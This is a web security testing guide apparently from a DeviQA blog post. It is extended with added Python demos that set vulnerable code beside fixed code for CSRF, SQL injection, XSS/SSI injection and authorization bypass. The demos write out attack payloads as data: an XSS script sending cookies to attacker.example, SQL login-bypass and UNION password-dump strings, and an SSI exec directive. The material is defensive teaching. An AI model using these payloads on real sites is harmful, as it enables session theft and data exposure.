
How to make security testing for web applications

By DeviQA on May 20, 2019


The rapid growth of online transactions has made security testing one of the most critical areas of web application testing. Security testing of a system is about finding the loopholes, unintended behaviours and weaknesses that could lead to a loss of information or to unauthorized access. Unintended behaviour can be triggered deliberately by an attacker or by accident. The aim of web security testing is to identify the threats the system faces and the vulnerabilities through which they could be realised, so that developers can fix the problems in code before an attacker finds them.

There are seven types of security testing. They are:

Vulnerability Scanning: Automated software scans the system against a database of known vulnerability signatures, such as outdated components with published flaws or known-bad configurations.

Security Scanning: This identifies network and system weaknesses and then proposes remediation to reduce the resulting risk. It can be performed manually or with automated tools.

Penetration Testing: This simulates an attack by a malicious actor, analysing a specific system for vulnerabilities that an external attacker could exploit.

Risk Assessment: This involves analysis of the security risks observed in the organization. Risks are ranked as low, medium or high, and the assessment recommends controls and measures to reduce them.

Security Auditing: An internal review of applications and operating systems for security flaws.

Posture Assessment: This combines security scanning, ethical hacking and risk assessment to show the overall security posture of an organization.

Ethical Hacking: Authorized hacking of an organization's software systems, with the aim of revealing security flaws before a real attacker does.

Web applications are also exposed to a number of specific threats that security testing must cover.

Cross-site Scripting (XSS) Attack

XSS is a client-side code injection attack. The attacker injects malicious scripts (commonly called the payload) into an otherwise legitimate website or web application, which is possible when the application reflects or stores user input without validating or encoding it. The victim is not the direct target: the vulnerable website the victim uses is, and it becomes the vehicle that delivers the script to the victim's browser, where it runs with the privileges of that site's origin. JavaScript is by far the most common payload language, although VBScript, ActiveX and Flash content have also been abused.

So an XSS attack needs three parties: the vulnerable website, the victim and the attacker.

XSRF / CSRF (Request Forgery)

In a CSRF attack the attacker borrows the identity of an already authenticated user rather than stealing it. The victim's browser holds a valid session cookie for the target site; the attacker lures the victim to a page or link that issues an HTTP request to that site, for example a form that submits itself automatically or an image tag whose URL triggers a state-changing action. Because the browser attaches the session cookie automatically, the server treats the forged request as legitimate and performs the action, such as changing an email address or transferring funds. This is the opposite of XSS: the attacker does not need to run script on the vulnerable site and normally cannot even read the response; the damage comes from the action the server carries out. The standard defences are to tie state-changing requests to something the attacker cannot forge, such as a per-session anti-CSRF token verified on the server, and to set the SameSite attribute on session cookies.
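The following is an added example, not code from the DeviQA post, showing a minimal anti-CSRF token scheme and why a forged cross-site request is rejected by a protected handler. The request dictionaries, the session store and the function names (issue_token, handle_transfer) are assumptions made for this illustration, not parts of any real framework.

```python
# Added example (not from the DeviQA post): a session-bound anti-CSRF token.
# SESSIONS, the request dicts and the handler names are constructed for the
# demonstration; they do not come from any real framework.
import hmac
import hashlib
import secrets
from typing import Optional

SERVER_SECRET = secrets.token_bytes(32)  # per-deployment secret, never sent to clients


def issue_token(session_id: str) -> str:
    """Derive an anti-CSRF token bound to one session.

    HMAC(secret, session_id) cannot be computed by an attacker who knows
    neither the server secret nor a way to read the victim's rendered page."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id: str, presented: Optional[str]) -> bool:
    if not presented:
        return False
    # compare_digest avoids leaking the token through timing differences
    return hmac.compare_digest(issue_token(session_id), presented)


def handle_transfer(request: dict, sessions: dict) -> tuple:
    """State-changing endpoint. `request` is a constructed stand-in for an HTTP
    request: cookies (attached automatically by the browser) and form fields."""
    session_id = request["cookies"].get("session")
    if session_id not in sessions:
        return 401, "not authenticated"
    if not token_is_valid(session_id, request["form"].get("csrf_token")):
        return 403, "csrf token missing or invalid"
    sessions[session_id]["balance"] -= int(request["form"]["amount"])
    return 200, f"transferred {request['form']['amount']} to {request['form']['to']}"


def demo() -> dict:
    sessions = {"victim-session": {"user": "alice", "balance": 1000}}
    # 1. Legitimate request: the site's own form carried the token it rendered.
    good = {"cookies": {"session": "victim-session"},
            "form": {"to": "bob", "amount": "100",
                     "csrf_token": issue_token("victim-session")}}
    # 2. Forged request from attacker.example: the browser still attaches the
    #    victim's cookie, but the attacker's page cannot know the token.
    forged = {"cookies": {"session": "victim-session"},
              "form": {"to": "attacker", "amount": "900"}}
    # 3. Attacker reuses a token issued to their OWN session against the victim's.
    replayed = {"cookies": {"session": "victim-session"},
                "form": {"to": "attacker", "amount": "900",
                         "csrf_token": issue_token("attacker-session")}}
    return {
        "legitimate": handle_transfer(good, sessions),
        "forged": handle_transfer(forged, sessions),
        "replayed": handle_transfer(replayed, sessions),
        "balance": sessions["victim-session"]["balance"],
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Only the legitimate request changes the balance; the forged request fails because the attacker's page has no way to obtain the token, and a token from the attacker's own session fails because the HMAC is bound to the session identifier. In a real application the token would also be rotated on login and the session cookie marked SameSite and HttpOnly.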

SQL Injection (SQLi)

SQL injection is a code injection attack in which the attacker gets the application to run SQL statements of the attacker's choosing against its backend database (the relational database management system, RDBMS). It happens when user input is concatenated into the text of a query instead of being passed as a bound parameter. With an SQL injection vulnerability an attacker can bypass the application's login, read data the application never meant to expose, and add, modify or delete records, affecting data integrity. SQL injection can therefore give an attacker unauthorized access to sensitive data, including customer data, personally identifiable information (PII), trade secrets, intellectual property and other confidential information.
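As an added example that is not part of the original post, here is the same login check written twice against an in-memory SQLite database constructed for the demonstration: once with string concatenation, once with a bound parameter. The schema, user rows and function names are made up for this illustration.

```python
# Added example (not from the DeviQA post): vulnerable vs parameterized SQL.
# The users table and its rows are constructed test data.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct horse", "admin"),
        ("bob", "hunter2", "user"),
    ])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Input is spliced straight into the SQL text, so a quote in the input
    changes the structure of the statement."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username: str, password: str):
    """Input is sent as a bound parameter; the driver never lets it be parsed
    as SQL, so the same payload is simply a password that matches nothing."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def profile_vulnerable(conn, username: str) -> list:
    """A lookup that returns every matching row. With a UNION payload the
    attacker appends a second SELECT and reads columns they should never see."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def demo() -> dict:
    conn = make_db()
    # Classic authentication bypass: closes the string, makes the WHERE clause
    # always true, and comments out the rest of the statement.
    bypass = "' OR '1'='1' --"
    # Data exfiltration: appends a second SELECT over the password column.
    union = "' UNION SELECT password, role FROM users --"
    return {
        "normal_safe": login_safe(conn, "bob", "hunter2"),
        "bypass_vulnerable": login_vulnerable(conn, "alice", bypass),
        "bypass_safe": login_safe(conn, "alice", bypass),
        "union_vulnerable": profile_vulnerable(conn, union),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

With the vulnerable query the payload logs the attacker in as the first user in the table (here the admin) without knowing any password, and the UNION payload returns every stored password through a field meant to show a username. The parameterized query treats the identical input as data and returns no row. Note that sqlite3 refuses to run stacked statements (a second statement after a semicolon), which is why the example does not show a `; DROP TABLE` payload; other drivers and databases do allow it.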

Server-Side Includes (SSI) Injection

SSI injection is a server-side exploitation technique that lets an attacker send code into a web application which the web server itself then executes. It occurs when user-supplied data is inserted, without sanitization, into an HTML file that the server processes for Server-Side Includes. If the attacker submits a Server-Side Include directive (for example an exec or include directive) that gets past validation, they may be able to execute arbitrary operating system commands or include the contents of restricted files when the page is served. Everything runs with the permissions of the web server user.
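Both XSS (above) and SSI injection depend on a literal `<` from user input reaching a place where the browser or the server interprets markup, so one example covers both. The following is an added example, not code from the DeviQA post: a toy server-side renderer that inserts a user-controlled search term into a page, first unencoded and then HTML-escaped, with two constructed payloads. The template, the payloads and the check function are assumptions made for this illustration; the SSI directive syntax is that of Apache mod_include.

```python
# Added example (not from the DeviQA post): raw interpolation vs output encoding.
# TEMPLATE, the payloads and is_injectable are constructed for the demonstration.
import html
import re

TEMPLATE = "<html><body><p>Results for: {term}</p></body></html>"

# Patterns a scanner would look for in the rendered page: an executable script
# tag, and an SSI directive that a server with includes enabled would process.
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
SSI_DIRECTIVE = re.compile(r"<!--#\s*(exec|include|echo|printenv|set|config)\b",
                           re.IGNORECASE)

XSS_PAYLOAD = ('<script>document.location="https://attacker.example/?c="'
               '+document.cookie</script>')
SSI_PAYLOAD = '<!--#exec cmd="id" -->'


def render_vulnerable(term: str) -> str:
    """Reflects the input verbatim: whatever the user typed becomes markup."""
    return TEMPLATE.format(term=term)


def render_safe(term: str) -> str:
    """Escapes <, >, &, " and ' so the input can only ever be text content.
    Both attacks need a literal '<', so this one encoding step stops both."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def is_injectable(page: str) -> dict:
    """Check a rendered page for live payloads; reports which families survive."""
    return {
        "xss": bool(SCRIPT_TAG.search(page)),
        "ssi": bool(SSI_DIRECTIVE.search(page)),
    }


def demo() -> dict:
    return {
        "vulnerable": {
            "xss": is_injectable(render_vulnerable(XSS_PAYLOAD)),
            "ssi": is_injectable(render_vulnerable(SSI_PAYLOAD)),
        },
        "safe": {
            "xss": is_injectable(render_safe(XSS_PAYLOAD)),
            "ssi": is_injectable(render_safe(SSI_PAYLOAD)),
        },
        "escaped_ssi": render_safe(SSI_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The escaped page contains `&lt;!--#exec cmd=&quot;id&quot; --&gt;`, which neither a browser nor mod_include will interpret. The caveat a tester should remember is that `html.escape` is only correct for HTML text and quoted attribute values; input placed inside a JavaScript block, a URL or a CSS rule needs the encoder for that context, and input that must keep some markup needs a sanitizer with an allow-list rather than escaping.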

Authorization Bypass

Through negligence, ignorance or simple underestimation of the threat, applications often protect only the login page and not the pages behind it. Authentication can then be bypassed by skipping the login page and calling an internal page directly, even though it should be reachable only after authentication has taken place. It is also possible to bypass authorization checks by manipulating requests so that the application believes the user is already authenticated or holds a higher privilege: by changing a URL parameter or hidden form field that encodes the user's identity or role, or by forging or reusing session identifiers.
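As an added example that is not part of the original post, the following toy request router shows two versions of an admin page: one that trusts a client-supplied role parameter and never checks for a login, and one that derives identity and role from a server-side session store. The Request class, the route, the session identifiers and the users are constructed for this illustration.

```python
# Added example (not from the DeviQA post): authorization bypass by direct page
# access and parameter tampering, beside the server-side check that stops it.
# Request, SESSIONS and the handler names are constructed for the demonstration.
from dataclasses import dataclass, field
from typing import Dict


@dataclass
class Request:
    path: str
    params: Dict[str, str] = field(default_factory=dict)   # query string / form
    cookies: Dict[str, str] = field(default_factory=dict)


# Server-side session store: the only source of truth for who the caller is.
# Real session ids must be long random strings (e.g. secrets.token_urlsafe);
# readable ids are used here only so the example is easy to follow.
SESSIONS = {
    "sess-alice": {"user": "alice", "role": "admin"},
    "sess-bob": {"user": "bob", "role": "user"},
}


def admin_page_vulnerable(req: Request) -> tuple:
    """Two classic mistakes: (1) no check that the caller ever logged in, so
    /admin can simply be requested directly; (2) the role is read from a value
    the client controls, so ?role=admin (or editing a hidden form field) works."""
    if req.params.get("role") == "admin":
        return 200, "admin panel"
    return 200, "user dashboard"


def admin_page_safe(req: Request) -> tuple:
    """Identity and role come from the session the server issued, never from the
    request's own claims; unauthenticated callers are sent to the login page."""
    session = SESSIONS.get(req.cookies.get("session", ""))
    if session is None:
        return 302, "/login"
    if session["role"] != "admin":
        return 403, "forbidden"
    return 200, "admin panel"


def demo() -> dict:
    direct = Request("/admin", params={"role": "admin"})               # never logged in
    tampered = Request("/admin", params={"role": "admin"},
                       cookies={"session": "sess-bob"})               # bob claims admin
    legit = Request("/admin", cookies={"session": "sess-alice"})
    forged_cookie = Request("/admin", cookies={"session": "sess-zzz"})  # guessed id
    return {
        "vulnerable": {"direct": admin_page_vulnerable(direct),
                       "tampered": admin_page_vulnerable(tampered)},
        "safe": {"direct": admin_page_safe(direct),
                 "tampered": admin_page_safe(tampered),
                 "legit": admin_page_safe(legit),
                 "forged_cookie": admin_page_safe(forged_cookie)},
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

When testing, the check is to request each internal page with no cookie at all, then with a low-privilege session while tampering with every parameter that looks like an identity or role, and confirm that only the server-side session decides the outcome.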

How to perform a website security test?

Security testing is a process performed with the intention of revealing flaws in security mechanisms and finding the vulnerabilities or weaknesses of software applications. In general, security testing must cover the following properties: authentication, authorization, confidentiality, availability, integrity and non-repudiation.

When performing security testing for a web application, focus on these four areas:

Network security: Seeking out vulnerabilities in the network infrastructure (resources and policies).

System software security: Assessing weaknesses in the various software the application depends on (operating system, database system).

Client-side application security: Ensuring that the client (the browser or any other user agent) cannot be manipulated to the detriment of other users, bearing in mind that attackers fully control their own client, so client-side checks can never replace server-side ones.

Server-side application security: Making sure that the server code and the technologies it runs on are robust enough to resist intrusion.

Let us consider some security testing tools for web applications.

Vega – This vulnerability scanner and testing tool detects web application vulnerabilities such as SQL injection, header injection and cross-site scripting. It is written in Java and runs on OS X, Linux and Windows. It is good at finding and validating SQL injection, cross-site scripting (XSS), inadvertently disclosed sensitive information and other vulnerabilities. Vega also probes TLS/SSL settings and identifies opportunities for improving the security of your TLS servers.

OWASP Zed Attack Proxy (ZAP) – This tool runs on Windows, Unix/Linux and macOS. It can be used as an automated scanner or as an intercepting proxy for testing a web page manually.

Wapiti – This web application security testing tool performs a black-box scan: it crawls the application and injects payloads to check whether a script is vulnerable. It supports attacks through both GET and POST HTTP methods, and detects vulnerabilities such as file disclosure, file inclusion and cross-site scripting (XSS).

SQLMap – Besides exploiting SQL injection, it supports connecting directly to a database without going through an injection point, by providing DBMS credentials, IP address, port and database name. It also automatically recognizes password hash formats and supports cracking them with a dictionary-based attack.

Google Nogotofail – This tool helps to spot and fix weak TLS/SSL connections and sensitive cleartext traffic on devices and apps in a flexible, scalable and powerful way. It tests for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping, cleartext issues and more. Nogotofail depends only on Python 2.7 and pyOpenSSL >= 0.13. It is designed to run on Linux; its transparent traffic-capture modes are Linux-specific and require iptables. It can be deployed as a router, VPN server or proxy server.

Keep in mind that security testing of web applications is far more effective at identifying vulnerabilities when it is performed regularly rather than as a one-off exercise. Security testing is essential in the IT industry to protect data by all available means.